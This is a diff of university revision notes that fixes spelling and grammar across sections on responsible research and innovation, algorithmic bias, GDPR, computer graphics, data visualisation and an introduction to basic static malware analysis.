The focus of RRI is not only on achieving ethically acceptable, socially desirable and sustainable outcomes. It also and fundamentally concerned with *how* research and innovation is conducted and the parties involved in the process. RRI can thus be broken down into four key elements: **policy**, **stakeholders**, **outcomes**, **process**. The focus of RRI is not only on achieving ethically acceptable, socially desirable and sustainable outcomes. It is also and fundamentally concerned with *how* research and innovation is conducted and the parties involved in the process. RRI can thus be broken down into four key elements: **policy**, **stakeholders**, **outcomes**, **process**.
###### Policy ###### Policy
The EU sets out six key policies to shape responsible research and innovation processes, which are target at governments, funding agencies and R&I organisations. The EU sets out six key policies to shape responsible research and innovation processes, which are targeted at governments, funding agencies and R&I organisations.
1. Robust goverence 1. Robust governance
- RRI principles should, as a matter of policy, be **embedded in robust** **governance** frameworks. These frameworks should be flexible and adapt to change so as to be capable of responding to the unpredictable nature of research and innovation. - RRI principles should, as a matter of policy, be **embedded in robust** **governance** frameworks. These frameworks should be flexible and adapt to change so as to be capable of responding to the unpredictable nature of research and innovation.
2. Gender equality 2. Gender equality
- It is also a matter of policy that research and innovation take the perspectives of both men and women into account to ensure outcomes are relevant to the whole population. - It is also a matter of policy that research and innovation take the perspectives of both men and women into account to ensure outcomes are relevant to the whole population.
- Decision-making bodies and R&I organisations should have balanced gender representation and strive to ensure **gender equality** in research and innovation. - Decision-making bodies and R&I organisations should have balanced gender representation and strive to ensure **gender equality** in research and innovation.
3. Integrity 3. Integrity
- Honesty, accountability, fairness and good stewardship should be core principles of research and innovation and are key to ensuring the **integrity** of R&I. - Honesty, accountability, fairness and good stewardship should be core principles of research and innovation and are key to ensuring the **integrity** of R&I.
4. Public and stakeholder engagment 4. Public and stakeholder engagement
- The **public and other stakeholders** should, as a matter of policy, be **engaged in research** and innovation processes as early as possible to avoid tokenism, ensure outcomes align with the values, needs and expectations of society and to avert societal backlash - The **public and other stakeholders** should, as a matter of policy, be **engaged in research** and innovation processes as early as possible to avoid tokenism, ensure outcomes align with the values, needs and expectations of society and to avert societal backlash
- as, for example, happened with the attempted introduction of GM crops into the UK - as, for example, happened with the attempted introduction of GM crops into the UK
5. Open Access (FAIR) 5. Open Access (FAIR)
- publicly funded research should be **open access** in order to catalyse broader innovation, encourage collaboration and improve the quality of research - publicly funded research should be **open access** in order to catalyse broader innovation, encourage collaboration and improve the quality of research
- Scientific results and data should follow the FAIR principle - Scientific results and data should follow the FAIR principle
- results and data should be **F**indable, **A**ccessible, **I**nteroperable, and **R**eusable - results and data should be **F**indable, **A**ccessible, **I**nteroperable, and **R**eusable
6. Science and technology education 6. Science and technology education
- The demand for highly qualified people continues to rise globally and there is also need as a matter of policy for improved **science and technology education** to build the necessary capacity to enable R&I at scale and to provide citizens with the knowledge they need to engage with research and innovation. - The demand for highly qualified people continues to rise globally and there is also need as a matter of policy for improved **science and technology education** to build the necessary capacity to enable R&I at scale and to provide citizens with the knowledge they need to engage with research and innovation.
###### Stakeholders ###### Stakeholders
RRI involves a range of stakeholders, who should in one way or another be involved in permanent and ongoing dialogue with one another. These stakeholders include: RRI involves a range of stakeholders, who should in one way or another be involved in permanent and ongoing dialogue with one another. These stakeholders include:
**Policymakers**, who have the ability to bring stakeholders to the table and foster debate. This not only includes government but funding agencies, the directors R&I organisations and anyone else involved in making decisions that shape research and innovation locally, nationally and internationally. **Policymakers**, who have the ability to bring stakeholders to the table and foster debate. This not only includes government but funding agencies, the directors of R&I organisations and anyone else involved in making decisions that shape research and innovation locally, nationally and internationally.
The **research community** is obviously a key stakeholder in research and innovation and includes everyone in the research and innovation pipeline from science advocates and communicators, to research managers, researchers, technicians and support staff. The **research community** is obviously a key stakeholder in research and innovation and includes everyone in the research and innovation pipeline from science advocates and communicators, to research managers, researchers, technicians and support staff.
**Business and industry**, from start ups to SMEs to large corporates and transnational companies, are all key to research and bringing innovations to bear on social life. **Business and industry**, from start-ups to SMEs to large corporates and transnational companies, are all key to research and bringing innovations to bear on social life.
**The education community**, from primary school to university, science centres and museums, and including teachers, students and their families, play a key role in building capacity and promoting public understanding of science and technology. **The education community**, from primary school to university, science centres and museums, and including teachers, students and their families, play a key role in building capacity and promoting public understanding of science and technology.
**Civil society organisations**, such as trade unions, NGOs and the media, also play important roles in shaping research and innovation. **Civil society organisations**, such as trade unions, NGOs and the media, also play important roles in shaping research and innovation.
RRI seeks to involve these stakeholders in shaping ethically acceptable, socially desirable and sustainable outcomes. Indeed, in recognising that research and innovation reaches beyond the lab, RRI seeks to foster **shared** **responsibility** for research and innovation and ensure that it that serves the public good. RRI seeks to involve these stakeholders in shaping ethically acceptable, socially desirable and sustainable outcomes. Indeed, in recognising that research and innovation reaches beyond the lab, RRI seeks to foster **shared** **responsibility** for research and innovation and ensure that it serves the public good.
###### Process ###### Process
@@ -141,15 +141,15 @@ Abma Tineke and Jacqueline Broerse’s ‘dialogue model’ of participatory res
**Exploration** is the first phase of the dialogue model and aims to identify and make contact with the different stakeholder organisations, groups, and individuals that should be involved in the research. **Exploration** is the first phase of the dialogue model and aims to identify and make contact with the different stakeholder organisations, groups, and individuals that should be involved in the research.
**Consultation** does at it suggests and engages stakeholders separately in a dialogue about the research to ensure their voices are heard. Tineke and Broerse emphasize the importance of paying attention to diversity (age, gender, ethnicity, etc.) and being sensitive to asymmetries in power in doing this. **Consultation** does as it suggests and engages stakeholders separately in a dialogue about the research to ensure their voices are heard. Tineke and Broerse emphasise the importance of paying attention to diversity (age, gender, ethnicity, etc.) and being sensitive to asymmetries in power in doing this.
- They underscore the need to empower stakeholders who are not used to actively participating in research to enable “more equal interaction with professionals” and that researchers should pay particular attention to the issues that matter to specific stakeholders. - They underscore the need to empower stakeholders who are not used to actively participating in research to enable “more equal interaction with professionals” and that researchers should pay particular attention to the issues that matter to specific stakeholders.
- Consultation also involves determining appropriate methods of conducting research dialogues with stakeholders, e.g., interviews, focus groups, questionnaires, observations, etc. - Consultation also involves determining appropriate methods of conducting research dialogues with stakeholders, e.g., interviews, focus groups, questionnaires, observations, etc.
**Prioritisation** as the name suggests is about identifying which research themes that emerge from the consultation process should be take priority. **Prioritisation** as the name suggests is about identifying which research themes that emerge from the consultation process should take priority.
- This often an iterative process involving further consultation with stakeholders to ensure the right themes are being prioritised appropriately. - This is often an iterative process involving further consultation with stakeholders to ensure the right themes are being prioritised appropriately.
- Importantly it involves consideration of what can reasonably be expected to be achieved within the lifetime of project, which means that while a theme may have high priority for stakeholders, it may not be technically achievable in the available timeframes, which may lead to it being de-prioritised. - Importantly it involves consideration of what can reasonably be expected to be achieved within the lifetime of the project, which means that while a theme may have high priority for stakeholders, it may not be technically achievable in the available timeframes, which may lead to it being de-prioritised.
- Prioritisation is a matter of compromise between what stakeholders want and what can be technically delivered. - Prioritisation is a matter of compromise between what stakeholders want and what can be technically delivered.
**Integration** seeks to combine the prioritised research themes into a coherent research agenda. **Integration** seeks to combine the prioritised research themes into a coherent research agenda.
@@ -159,7 +159,7 @@ Abma Tineke and Jacqueline Broerse’s ‘dialogue model’ of participatory res
The **programming** phase involves specifying a research plan to enable the research agenda to be implemented. The **programming** phase involves specifying a research plan to enable the research agenda to be implemented.
- It involves setting a programming committee involving stakeholder representatives to ensure the research addresses the concerns of all stakeholders as it proceeds into implementation. - It involves setting up a programming committee involving stakeholder representatives to ensure the research addresses the concerns of all stakeholders as it proceeds into implementation.
And **implementation** obviously involves putting the plan into practice. And **implementation** obviously involves putting the plan into practice.
@@ -171,11 +171,11 @@ The collective resources approach led to action-based and experience-based desig
Prototyping was established as an alternative approach to requirements specification in the 1970s, replacing a written document subject to the vagaries of interpretation with a functioning version of a computing system. Prototyping was established as an alternative approach to requirements specification in the 1970s, replacing a written document subject to the vagaries of interpretation with a functioning version of a computing system.
The **problem** with prototyping is that it is by its very nature a technical exercise, all too often preoccupied with demonstrating technical features to stakeholders and having them sign-off on them. The **problem** with prototyping is that it is by its very nature a technical exercise, all too often preoccupied with demonstrating technical features to stakeholders and having them sign off on them.
The challenge that Cooperative Design set out tackle was how to *involve* ordinary people – users and other non-technical stakeholders – in the actual development of prototypes. The challenge that Cooperative Design set out to tackle was how to *involve* ordinary people – users and other non-technical stakeholders – in the actual development of prototypes.
Prototyping is a common feature of many design models today, from the spiral model to agile. The contribution of Cooperative Design is to use it as a vehicle for put stakeholder viewpoints and experience at the centre of the design process, not technical specifications and feature demonstrations, and it provides us with a tried and tested way of doing participatory research in computing. Prototyping is a common feature of many design models today, from the spiral model to agile. The contribution of Cooperative Design is to use it as a vehicle for putting stakeholder viewpoints and experience at the centre of the design process, not technical specifications and feature demonstrations, and it provides us with a tried and tested way of doing participatory research in computing.
### RRI self-reflection tool ### RRI self-reflection tool
@@ -12,11 +12,11 @@ According to code 1.4 from the ACM code of ethics, computing professionals shoul
#### b) #### b)
Algorithmic bias is a series of systematic and repeatable errors, that over the course of the systems runtime, produces output that dis-proportionally discriminates against individuals and/or social groups. Selena Silva and Martin Kenny found 9 sources of algorithmic bias in their research paper, all of which capable of discriminating and producing bias Algorithmic bias is a series of systematic and repeatable errors that, over the course of the system’s runtime, produces output that disproportionately discriminates against individuals and/or social groups. Selena Silva and Martin Kenny found 9 sources of algorithmic bias in their research paper, all of which are capable of discriminating and producing bias
Bias can be introduced in the development of a machine learning system. Training bias is where data used to train the algorithm may be unrepresentive or prejudiced, this can cause the system to unfairly associate one trait to another even though they have no effect on one another. This can be through the developers own bias by only including data sets representative to their own socitak group or through systemic bias where minority groups are under represented in national and global data sets. Developers can also introduce bias by including or excluding certain attributes. This is called algorithmic focus bias and developers must take variables supplied to the algorithm into careful consideration, evaluating why each variable needs to be included in the system. Similarly bias can arise from the way data is processed, for example this can be from weighting quantitative attributes higher than qualitative ones simply as quantitative data is easier to manipulate, this is called algorithmic processing bias. Non-transparency bias is where companies do not divulge or explain how they came to certain decisions, what their rationale was for different design choices. In the best case this can introduce bias in an unforeseen way as all the developers may come from similar social groups and in the worse case scenario developers can obstruct reviews of the algorithm, allowing discrimination to take place. Bias can be introduced in the development of a machine learning system. Training bias is where data used to train the algorithm may be unrepresentative or prejudiced; this can cause the system to unfairly associate one trait with another even though they have no effect on one another. This can be through the developers’ own bias by only including data sets representative of their own social group or through systemic bias where minority groups are under-represented in national and global data sets. Developers can also introduce bias by including or excluding certain attributes. This is called algorithmic focus bias and developers must take variables supplied to the algorithm into careful consideration, evaluating why each variable needs to be included in the system. Similarly, bias can arise from the way data is processed, for example from weighting quantitative attributes higher than qualitative ones simply because quantitative data is easier to manipulate; this is called algorithmic processing bias. Non-transparency bias is where companies do not divulge or explain how they came to certain decisions or what their rationale was for different design choices. In the best case this can introduce bias in an unforeseen way as all the developers may come from similar social groups and in the worst-case scenario developers can obstruct reviews of the algorithm, allowing discrimination to take place.
Bias can also arise in the use of computing systems. Transfer context bias is where machine learning systems are used inappropriately. This can happen in job applications where credit checks are required or in justice systems where race needs to be explicitly stated. The assumption job performance correlates to wealth or criminal charges correlates to race is unfair and biased. Therefore the use of computer systems particularly in subjective use cases should be scrutinised to ensure the potential benefits outweigh the increased chance of discriminating or additional steps are taken after the system outputs to mitigate any potential harms. Similarly automation bias is where humans hold the output of a system in high regard and don’t question or apply additional thought. Computer systems used in subjective context such as justice systems should be treated as a second opinion or a statistical model and disregarded readily when an unsuitable result is returned. Consumer bias is where bias is introduced to the system via the training data. Humans are inherently flawed and biased and therefore extra care and additional review steps should be added to check the neutrality of the training data. Likewise feedback loop bias affects systems that learn from user behaviour, which again is prone to being discriminatory. This requires special attention has even when a system has been developed without bias, bias is introduced through the systems use lifetime. Lastly interpretation bias is where humans introduce bias from interpreting results from the algorithm. For example if the algorithm agrees with someones own bias, they might be more likely to give a more extreme verdict however if it opposes their own opinion, the result may be completely disregarded. Bias can also arise in the use of computing systems. Transfer context bias is where machine learning systems are used inappropriately. This can happen in job applications where credit checks are required or in justice systems where race needs to be explicitly stated. The assumption that job performance correlates with wealth or criminal charges correlate with race is unfair and biased. Therefore, the use of computer systems particularly in subjective use cases should be scrutinised to ensure the potential benefits outweigh the increased chance of discriminating or additional steps are taken after the system outputs to mitigate any potential harms. Similarly, automation bias is where humans hold the output of a system in high regard and don’t question it or apply additional thought. Computer systems used in subjective contexts such as justice systems should be treated as a second opinion or a statistical model and disregarded readily when an unsuitable result is returned. Consumer bias is where bias is introduced to the system via the training data. Humans are inherently flawed and biased and therefore extra care and additional review steps should be added to check the neutrality of the training data. Likewise, feedback loop bias affects systems that learn from user behaviour, which again is prone to being discriminatory. This requires special attention as even when a system has been developed without bias, bias is introduced through the system’s useful lifetime. Lastly, interpretation bias is where humans introduce bias from interpreting results from the algorithm. For example, if the algorithm agrees with someone’s own bias, they might be more likely to give a more extreme verdict; however, if it opposes their own opinion, the result may be completely disregarded.
## Question 3 ## Question 3
@@ -30,15 +30,14 @@ The application scope is worldwide, the regulation states “This Regulation app
To enable proper data protection by design and default, a number of presets must be implemented. To enable proper data protection by design and default, a number of presets must be implemented.
Firstly controllers must be transparent about how and why they are collecting and using data, how they use and share personal data and how data subjects can exercise their legal rights over data processing. This includes the right to: access, object, intervene, restrict, rectify, export and erase. This allows for data subjects to have full knowledge and control over their data and on top of this, recital 63 of GDPR states “where possible controller[s] should … provide remote access … with direct access to his or her personal data”. Controllers must also by default declare a valid legal basis for the processing. This ensures transparency as there is full disclosure of how data subjects legal rights are being maintained. Firstly, controllers must be transparent about how and why they are collecting and using data, how they use and share personal data and how data subjects can exercise their legal rights over data processing. This includes the right to: access, object, intervene, restrict, rectify, export and erase. This allows for data subjects to have full knowledge and control over their data and on top of this, recital 63 of GDPR states “where possible controller[s] should … provide remote access … with direct access to his or her personal data”. Controllers must also by default declare a valid legal basis for the processing. This ensures transparency as there is full disclosure of how data subjects’ legal rights are being maintained.
Controllers must ensure their data processing operations are fair. This principle requires personal data should not be processed in ways that are unjustifiably detrimental, unexpected or misleading to the data subject. Fairness is especially prevalent in dealing with AI systems since these do not operate on predefined instructions written by humans, therefore controllers should be able to demonstrate fairness through the inputs and outputs of the system. Controllers must ensure their data processing operations are fair. This principle requires personal data should not be processed in ways that are unjustifiably detrimental, unexpected or misleading to the data subject. Fairness is especially prevalent in dealing with AI systems since these do not operate on predefined instructions written by humans, therefore controllers should be able to demonstrate fairness through the inputs and outputs of the system.
Controllers must explicitly state what the data collected on data subjects will be used for. These must be specific tasks and cannot be processed in way that doesn’t align with the initial reason given. This is called purpose limitation and prevents controllers from collecting as much data as possible for monetary gain or nefarious purposes. This allows data subjects to only give their data to controllers who’s vision aligns with their own. Controllers must explicitly state what the data collected on data subjects will be used for. These must be specific tasks and the data cannot be processed in a way that doesn’t align with the initial reason given. This is called purpose limitation and prevents controllers from collecting as much data as possible for monetary gain or nefarious purposes. This allows data subjects to only give their data to controllers whose vision aligns with their own.
Controllers must practise data minimisation, this is a practice where the controller must review the data being asked and verifying all pieces of data are needed to meet the purposes for which they are being processed. This can also include the degree of identification, if the purpose is statistical this likely does not require any immediate identifying attributes. If continued identification is needed, data should be pseudonoymised to migrate damages caused from a data breach. Similarly data must be deleted once it has fulfilled it’s purpose. GDPR places no time limit on data storage of anonymised data however this can be reversed engineered and this data should be treated analogous to raw personal data. Controllers must practise data minimisation; this is a practice where the controller must review the data being requested and verify that all pieces of data are needed to meet the purposes for which they are being processed. This can also include the degree of identification; if the purpose is statistical this likely does not require any immediate identifying attributes. If continued identification is needed, data should be pseudonymised to mitigate damage caused by a data breach. Similarly, data must be deleted once it has fulfilled its purpose. GDPR places no time limit on data storage of anonymised data; however, this can be reverse-engineered and this data should be treated analogously to raw personal data.
Controllers must also ensure data is accurate, and if not it is the controllers duty to rectify or erase mistakes immediately. This is important as data subjects could be relying on this data for employment, housing or other civic needs and not being able to obtain this could cause harm to the data subject and family. Controllers must also ensure data is accurate, and if not it is the controller’s duty to rectify or erase mistakes immediately. This is important as data subjects could be relying on this data for employment, housing or other civic needs and not being able to obtain this could cause harm to the data subject and family.
Lastly controllers must put substantial measures in place to prevent unauthorised access, accidental loss and destruction or damage. Regular reviews should be conducted, testing security and inviting professional hackers to further test how the system stands up to new hacking methods. Lastly controllers must put substantial measures in place to prevent unauthorised access, accidental loss and destruction or damage. Regular reviews should be conducted, testing security and inviting professional hackers to further test how the system stands up to new hacking methods.
+10 -10
View File
@@ -12,7 +12,7 @@ Rendering in 2-Dimensions involves the following
A **vertex** is a point in space and is used to model geometry. A vertex can be presented using a vector, which is like an arrow. Can be written as $v=(3,2,0)$ A **vertex** is a point in space and is used to model geometry. A vertex can be presented using a vector, which is like an arrow. Can be written as $v=(3,2,0)$
A *fragement* is a piece of a triangle which will be drawn to a pixel. A *fragment* is a piece of a triangle which will be drawn to a pixel.
A section of memory called a **frame buffer** (or colour buffer) stores the colour values that will be used at each pixel. A section of memory called a **frame buffer** (or colour buffer) stores the colour values that will be used at each pixel.
@@ -21,15 +21,15 @@ A shader is a program. Shaders are run on the GPU.
#### Rendering Stages #### Rendering Stages
1. Vertex Specification 1. Vertex Specification
- In the application the vertices making up the triangles are specified, that is, given positions. The application is a software program which might be a Computer Aided Design (CAD), some kind of simulation, a visualisation, or a videogame. The graphics programmer specifies the location of vertices which make up the triangles to be rendered. These vertices are passed to the vertex shaders. - In the application the vertices making up the triangles are specified, that is, given positions. The application is a software program which might be a computer-aided design (CAD) program, some kind of simulation, a visualisation, or a video game. The graphics programmer specifies the location of vertices which make up the triangles to be rendered. These vertices are passed to the vertex shaders.
2. Vertex Shader 2. Vertex Shader
- Vertex processing by the vertex shader moves the vertices around. . The Vertices are used to construct triangles. - Vertex processing by the vertex shader moves the vertices around. The vertices are used to construct triangles.
3. Rasterisation 3. Rasterisation
- There may be empty space around the triangles. Rasterisation is the process of taking all of the triangles and figuring out which pixels are inside each of the triangles. - There may be empty space around the triangles. Rasterisation is the process of taking all of the triangles and figuring out which pixels are inside each of the triangles.
- Each of these pixels inside the triangles is called a fragment. - Each of these pixels inside the triangles is called a fragment.
- Rasterisation will generate a fragment for each pixel which is inside a triangle. The fragments are passed to the fragment shaders. - Rasterisation will generate a fragment for each pixel which is inside a triangle. The fragments are passed to the fragment shaders.
4. Fragment Shader 4. Fragment Shader
- The colour of Fragments is calculated by the fragment shader. - The colour of fragments is calculated by the fragment shader.
## Rasterisation ## Rasterisation
@@ -46,11 +46,11 @@ for each pixel y in Y dimension {
} }
``` ```
#### Barcentric Coordinates #### Barycentric Coordinates
We can use this to calculate if a point is inside a triangle or not. We can use this to calculate if a point is inside a triangle or not.
The barrcentric coordintates are $\alpha, \beta, \gamma$. The barycentric coordinates are $\alpha, \beta, \gamma$.
$\alpha$ corresponds to the normalised linear distance of P between the line $\alpha$=0 and $\alpha$=1 $\alpha$ corresponds to the normalised linear distance of P between the line $\alpha$=0 and $\alpha$=1
@@ -4,7 +4,7 @@
1. Make a window and a context 1. Make a window and a context
- This is OS specific, therefore we need GLFW to set this up for us - This is OS specific, therefore we need GLFW to set this up for us
2. Load all OpenGL methods (GLAD) 2. Load all OpenGL methods (GLAD)
@@ -12,9 +12,8 @@
4. Specify vertices (C) 4. Specify vertices (C)
5. Setup objects to communicate to the shaders (OpenGL) 5. Set up objects to communicate with the shaders (OpenGL)
6. Render loop (OpenGL) 6. Render loop (OpenGL)
7. Deinitialisation (GLFW) 7. Deinitialisation (GLFW)
+10 -10
View File
@@ -3,14 +3,14 @@
### Vectors ### Vectors
- The n-dimensional Euclidean Space is $\mathbb{R}^n$ - The n-dimensional Euclidean Space is $\mathbb{R}^n$
- $\mathbb{R}^n = \{(v_0, v_1, ... v_{n-1}) | v_0, v_1, ...v_{n-1} \in \mathbb{R}\}$ - $\mathbb{R}^n = \{(v_0, v_1, ... v_{n-1}) | v_0, v_1, ...v_{n-1} \in \mathbb{R}\}$
- A vector is an n-turple - A vector is an n-tuple
- $v\in \mathbb{R}^n \Longleftrightarrow v=(v_0, v_1, ...v_{n-1}) | v_0, v_1, ...v_{n-1} \in \mathbb{R}$ - $v\in \mathbb{R}^n \Longleftrightarrow v=(v_0, v_1, ...v_{n-1}) | v_0, v_1, ...v_{n-1} \in \mathbb{R}$
- In computer graphics we normally deal with 3-Dimensional Euclidean space $\mathbb{R}^3$ - In computer graphics we normally deal with 3-Dimensional Euclidean space $\mathbb{R}^3$
- vec3 notation: - vec3 notation:
- $v=(v_0, v_1, v_2)$ - $v=(v_0, v_1, v_2)$
- $v = \begin{pmatrix} {v_0}\\{v_1}\\{v_2} \end{pmatrix}$ - $v = \begin{pmatrix} {v_0}\\{v_1}\\{v_2} \end{pmatrix}$
- Where $v_0$ represents x, $v_1$ represents y, and $v_2$ represents z axis - Where $v_0$ represents the x axis, $v_1$ represents the y axis, and $v_2$ represents the z axis
##### Vector Scaling ##### Vector Scaling
@@ -104,18 +104,18 @@ Two matrices can only be multiplied if they both have the same number of columns
To get the resulting matrix, for each $(x,y)$ pair, is the cross product of the $x^{th}$ column and the $y^{th}$ row. To get the resulting matrix, for each $(x,y)$ pair, is the cross product of the $x^{th}$ column and the $y^{th}$ row.
- Matrix multiplication is not communative - Matrix multiplication is not commutative
- $MN \neq NM$ - $MN \neq NM$
###### Matrix-Vector Multiplication ###### Matrix-Vector Multiplication
A matrix multiplied by vector gives new vector A matrix multiplied by a vector gives a new vector
Each row of the resulting vector is that row of the vector, dot producted with that row on the matrix. Each row of the resulting vector is that row of the vector, dot producted with that row on the matrix.
##### Trigonometry ##### Trigonometry
If $p=(p_x, p_y)$ is a unit vector, we can write them as: If $p=(p_x, p_y)$ is a unit vector, we can write its components as:
$$ $$
p_x = cos \space \alpha \\ p_x = cos \space \alpha \\
+2 -2
View File
@@ -33,7 +33,7 @@ $$
v \cdot s = \begin{pmatrix} v_0 \cdot s_0 \\ v_1\cdot s_1 \end{pmatrix} v \cdot s = \begin{pmatrix} v_0 \cdot s_0 \\ v_1\cdot s_1 \end{pmatrix}
$$ $$
We can scale triangles by scaling each of its vertices We can scale triangles by scaling each of their vertices
### Transformation Matrix ### Transformation Matrix
@@ -106,7 +106,7 @@ z:
#### Combining Transformations #### Combining Transformations
For example if point $p$ needs to be scaled by $s=(2,1,1)$ and then translated by $t=(1,0,0)$ For example, if point $p$ needs to be scaled by $s=(2,1,1)$ and then translated by $t=(1,0,0)$
$$ $$
S = \begin{pmatrix} S = \begin{pmatrix}
+2 -2
View File
@@ -9,7 +9,7 @@
- A cube has one vertex at each corner which are positioned relative to the centre of the cube - A cube has one vertex at each corner which are positioned relative to the centre of the cube
- In model space there is no information about where a model is relative to anything in the world, there is only information about the relative positions of the vertices which make up the model - In model space there is no information about where a model is relative to anything in the world, there is only information about the relative positions of the vertices which make up the model
- **World Space** - **World Space**
- World space is relative top a larger coordinate system - World space is relative to a larger coordinate system
- Vertices are positioned in model space and then all moved to the appropriate position in the world - Vertices are positioned in model space and then all moved to the appropriate position in the world
- **View Space** - **View Space**
- View space has all vertices from the perspective of the viewer - View space has all vertices from the perspective of the viewer
@@ -21,7 +21,7 @@
- Vertices inside the NDC space will be rendered at those positions - Vertices inside the NDC space will be rendered at those positions
- **Screen space** - **Screen space**
- Screen space maps directly to the pixels on the screen - Screen space maps directly to the pixels on the screen
- From now vertices can be used to construct triangles, which are rasterised and the appropriate pixels are coloured - From this point, vertices can be used to construct triangles, which are rasterised and the appropriate pixels are coloured
- Model Transform - Model Transform
- The transformation of vertices from model space to world space - The transformation of vertices from model space to world space
+16 -11
View File
@@ -10,17 +10,22 @@ The four rendering stages:
![1647365644.png](img/1647365644.png) ![1647365644.png](img/1647365644.png)
- **Application stage** is the software that runs on the CPU - **Application stage** is the software that runs on the CPU
- ![1647366052.png](img/1647366052.png)
![1647366052.png](img/1647366052.png)
- **Vertex processing stage** is responsible for processing operations on individual vertices - **Vertex processing stage** is responsible for processing operations on individual vertices
- In this stage vertex positions are transformed from model space to world and then view space, and projected to clip coordinates - In this stage vertex positions are transformed from model space to world and then view space, and projected to clip coordinates
- Vertex **post processing**: - Vertex **post-processing**:
1. Primitive Assembly 1. Primitive Assembly
2. Clipping 2. Clipping
- ![1647366278.png](img/1647366278.png)
3. Perspective divide ![1647366278.png](img/1647366278.png)
4. View-port transformation
3. Perspective divide
4. Viewport transformation
- **Rasterisation stage** is responsible for calculating all of the pixels inside the triangles that are being rendered - **Rasterisation stage** is responsible for calculating all of the pixels inside the triangles that are being rendered
- **Pixel processing stage** is responsible for processing operations on individual fragments. - **Pixel processing stage** is responsible for processing operations on individual fragments.
- Texturing can also happen in the fragment shader - Texturing can also happen in the fragment shader
- Fragment shader computes a colour which is then merged with the colour buffer - Fragment shader computes a colour which is then merged with the colour buffer
- Merging calculates which fragments are hidden behind other fragments and only keeps the colour for the visible fragment - Merging calculates which fragments are hidden behind other fragments and only keeps the colour for the visible fragment
+5 -5
View File
@@ -12,14 +12,14 @@ A camera involves
3. A right direction 3. A right direction
4. An up direction 4. An up direction
Calculating a camera direction can be achieved using Euler angles, **pitch**, **yaw** and **roll** . Calculating a camera direction can be achieved using Euler angles, **pitch**, **yaw** and **roll**.
- Pitch rotates the camera on the x axis - Pitch rotates the camera on the x axis
- Think of a plane pointing its nose to the floor or to the sky - Think of a plane pointing its nose to the floor or to the sky
- Yaw rotates the camera on the y axis - Yaw rotates the camera on the y axis
- Think a plane moving the nose left to right keeping the wings parallel with the ground - Think of a plane moving the nose left to right keeping the wings parallel with the ground
- Roll rotates the camera on the z axis - Roll rotates the camera on the z axis
- Think tilting the plane’s wings left and right, but not changing the direction of the nose - Think of tilting the plane’s wings left and right, but not changing the direction of the nose
#### Model-Viewer Camera #### Model-Viewer Camera
@@ -49,7 +49,7 @@ The camera has a position in world space and a focus direction `front`, which ca
We can move this kind of camera, forward, backward, left and right along with pitch, roll and yaw. We can move this kind of camera, forward, backward, left and right along with pitch, roll and yaw.
The camera is at the center of the sphere, and the model moves around the edge of the sphere. The camera is at the centre of the sphere, and the model moves around the edge of the sphere.
A unit vector points from the camera to the model as the front direction of the camera A unit vector points from the camera to the model as the front direction of the camera
+7 -12
View File
@@ -4,7 +4,7 @@
- How do we avoid being overwhelmed? - How do we avoid being overwhelmed?
- How do we make sense of the data? - How do we make sense of the data?
- How do we harness this data in decision-making process? - How do we harness this data in the decision-making process?
###### Objective ###### Objective
@@ -23,26 +23,21 @@ Here we can see that statistically these sets are similar
![1645029788.png](img/1645029788.png) ![1645029788.png](img/1645029788.png)
However graphing them, we can see that these data sets are very different. However, by graphing them, we can see that these data sets are very different.
#### Common Information Visualisations #### Common Information Visualisations
- Pie charts - Pie charts
- Very common, easy to understand, visually appealing - Very common, easy to understand, visually appealing
- Can make comparisons harder with many segments - Can make comparisons harder with many segments
- Bar chart - Bar chart
- Makes comparisons between bars easier - Makes comparisons between bars easier
- Calendar View - Calendar View
- https://observablehq.com/@d3/calendar - https://observablehq.com/@d3/calendar
- Can spot long-term trends - e.g. seasonal, annual trends - Can spot long-term trends - e.g. seasonal, annual trends
###### Wikipedia Edit Evolution ###### Wikipedia Edit Evolution
![img](img/a.png) ![img](img/a.png)
Note the use of colour and shape. Note the use of colour and shape.
@@ -14,23 +14,23 @@
**Record** information **Record** information
- Blueprints, photographs, seimographs - Blueprints, photographs, seismographs
**Communicate** information to others **Communicate** information to others
- Share and persuade - Share and persuade
- Think Florence Nightingale using a graph to show deaths to infection was the leading cause of death in hospitals - Think of Florence Nightingale using a graph to show that infection was the leading cause of death in hospitals
- Collaborate and revise - Collaborate and revise
- Think the London tube map, before was geographically accurate, now is only topologically accurate - Think of the London tube map: before it was geographically accurate, now it is only topologically accurate
Analysis data to **support reasoning** Analyse data to **support reasoning**
- Find patterns - Find patterns
- Think the London Cholera map, how John Snow found out where the infection was coming from - Think of the London Cholera map, how John Snow found out where the infection was coming from
- Discover errors in data - Discover errors in data
- Expand memory - Expand memory
- Imaging doing a sum like $34\times 52$ mentally verses with a pen and paper - Imagine doing a sum like $34\times 52$ mentally versus with a pen and paper
- Visualising the sum (column multiplication) can expand your memory - Visualising the sum (column multiplication) can expand your memory
- Develop and assess hypotheses - Develop and assess hypotheses
#### Different Stages of Visualisation #### Different Stages of Visualisation
@@ -38,11 +38,11 @@ Analysis data to **support reasoning**
![1645033524.png](img/1645033524.png) ![1645033524.png](img/1645033524.png)
- Data transformation - Data transformation
- Create a structural model, schema, mapping raw data into data tables - Create a structural model, schema, mapping raw data into data tables
- Visual Mapping - Visual Mapping
- Create a visual spatial model, transforming data tables into visual structures - Create a visual spatial model, transforming data tables into visual structures
- View Transformations - View Transformations
- Create views of the Visual Structures by specifying graphical parameters such as position, scaling and clipping. - Create views of the Visual Structures by specifying graphical parameters such as position, scaling and clipping.
![1645033689.png](img/1645033689.png) ![1645033689.png](img/1645033689.png)
@@ -61,12 +61,12 @@ Analysis data to **support reasoning**
###### Mine ###### Mine
- Apply methods from statistics or data mining as a way to discern patterns or place the data in mathematical context - Apply methods from statistics or data mining as a way to discern patterns or place the data in mathematical context
- Work out mean, standard deviation etc - Work out mean, standard deviation etc
###### Represent ###### Represent
- Choose a visual model - Choose a visual model
- Bar chart, graph, pie chart etc - Bar chart, graph, pie chart etc
###### Refine ###### Refine
@@ -78,6 +78,5 @@ Analysis data to **support reasoning**
##### Interaction is Vital for Exploration ##### Interaction is Vital for Exploration
- Engage in a dialog with your data - Engage in a dialogue with your data
- Employ interaction in a more fundamental manner to strengthen the power of visualisation - Employ interaction in a more fundamental manner to strengthen the power of visualisation
+30 -31
View File
@@ -3,46 +3,46 @@
### Basic Static Analysis ### Basic Static Analysis
- Examining the executable file without viewing the actual instructions - Examining the executable file without viewing the actual instructions
- This can confirm whether a file is malicious - This can confirm whether a file is malicious
- Provide information about its functionality - Provide information about its functionality
- Provide information that will allow us to produce network signatures - Provide information that will allow us to produce network signatures
- Basic static analysis is straightforward and quick - Basic static analysis is straightforward and quick
